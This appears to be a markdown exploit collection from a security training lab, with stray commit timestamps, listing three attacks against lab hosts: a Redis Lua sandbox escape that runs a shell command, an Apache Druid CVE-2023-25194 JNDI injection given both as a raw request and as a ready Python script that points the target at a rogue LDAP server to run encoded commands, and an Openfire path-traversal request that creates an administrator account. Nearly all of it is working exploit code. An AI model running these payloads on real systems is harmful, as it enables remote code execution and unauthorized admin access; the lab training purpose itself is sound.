2023-08-27 15:27:54 -04:00
# Additional Exploits Used in WebSploit Labs
2023-08-27 16:40:05 -04:00
## DC31_01
2023-08-27 15:27:54 -04:00
```
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0
```
2023-08-27 16:40:05 -04:00
## DC31_02
```
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: 10.7.7.22:8888
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 1792
{
"type":"kafka",
"spec":{
"type":"kafka",
"ioConfig":{
"type":"kafka",
"consumerProperties":{
"bootstrap.servers":"127.0.0.1:6666",
"sasl.mechanism":"SCRAM-SHA-256",
"security.protocol":"SASL_SSL",
"sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://roguo-jndi-server:1389/Basic/Command/base64/aWQgPiAvdG1wL3N1Y2Nlc3M=\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
},
"topic":"test",
"useEarliestOffset":true,
"inputFormat":{
"type":"regex",
"pattern":"([\\s\\S]*)",
"listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",
"columns":[
"raw"
]
}
},
"dataSchema":{
"dataSource":"sample",
"timestampSpec":{
"column":"!!!_no_such_column_!!!",
"missingValue":"1970-01-01T00:00:00Z"
},
"dimensionsSpec":{
},
"granularitySpec":{
"rollup":false
}
},
"tuningConfig":{
"type":"kafka"
}
},
"samplerConfig":{
"numRows":500,
"timeoutMs":15000
}
}
```
This is a python script that can also be used:
```
'''
This script exploits the Druid RCE vulnerability (CVE-2023-25194) to execute commands on the target machine.
'''
import argparse
import base64
import requests
import json
def send_post_request(url, headers, data):
'''
send post request
:param url: url
:param headers: headers
:param data: data
:return: None
'''
response = requests.post(url, headers=headers, data=json.dumps(data))
status_code = response.status_code
content = response.content.decode('utf-8')
if status_code == 500 or 'createChannelBuilde' in content:
print('[+] Exploit Success ~')
else:
print('[-] Exploit maybe fail.')
def get_data(jndi_ip, cmd):
'''
Function to get data for POST request body
:param jndi_ip: jndi_ip
:param cmd: command to execute
:return: data
'''
data = {
"type": "kafka",
"spec": {
"type": "kafka",
"ioConfig": {
"type": "kafka",
"consumerProperties": {
"bootstrap.servers": "127.0.0.1:6666",
"sasl.mechanism": "SCRAM-SHA-256",
"security.protocol": "SASL_SSL",
"sasl.jaas.config": f"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://{jndi_ip}:1389/Basic/Command/base64/{cmd}\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
},
"topic": "test",
"useEarliestOffset": True,
"inputFormat": {
"type": "regex",
"pattern": "([\\s\\S]*)",
"listDelimiter": "56616469-6de2-9da4-efb8-8f416e6e6965",
"columns": [
"raw"
]
}
},
"dataSchema": {
"dataSource": "sample",
"timestampSpec": {
"column": "!!!_no_such_column_!!!",
"missingValue": "1970-01-01T00:00:00Z"
},
"dimensionsSpec": {
},
"granularitySpec": {
"rollup": False
}
},
"tuningConfig": {
"type": "kafka"
}
},
"samplerConfig": {
"numRows": 500,
"timeoutMs": 15000
}
}
# print(data)
return data
def base64_encode(original_str):
'''
Function to encode string with base64
:param original_str: original string
:return: encoded string
'''
original_bytes = original_str.encode('utf-8')
encoded_bytes = base64.b64encode(original_bytes)
encoded_str = encoded_bytes.decode('utf-8')
return encoded_str
if __name__ == '__main__':
'''
The following are the arguments required for the script to run successfully
-t, --target: target IP or hostname
-j, --jndi-ip: jndi_ip
-c, --cmd: command to execute
'''
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--target', type=str, required=True, help='target IP or hostname')
parser.add_argument('-j', '--jndi-ip', type=str, required=True, help='jndi_ip')
parser.add_argument('-c', '--cmd', type=str, required=True, help='command to execute')
args = parser.parse_args()
# Target URL
url = f"http://{args.target}:8888/druid/indexer/v1/sampler"
print("[+] URL:" + url)
print("[+] Target IP:" + args.target)
print("[+] JNDI IP:" + args.jndi_ip)
print("[+] Command:" + args.cmd)
# Headers for POST request
headers = {
"Accept-Encoding": "gzip, deflate",
"Accept": "*/*",
"Accept-Language": "en-US;q=0.9,en;q=0.8",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36",
"Connection": "close",
"Cache-Control": "max-age=0",
"Content-Type": "application/json"
}
# Get data for POST request body
data = get_data(args.jndi_ip, base64_encode(args.cmd))
# Send POST request
send_post_request(url, headers, data)
```
2023-08-27 16:50:31 -04:00
## DC31_03
```
GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=csrftoken& username=omar& name=& email=& password=hackme& passwordConfirm=hackme& isadmin=on& create=Create+User HTTP/1.1
Host: 10.7.7.22:9090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: csrf=csrftoken
```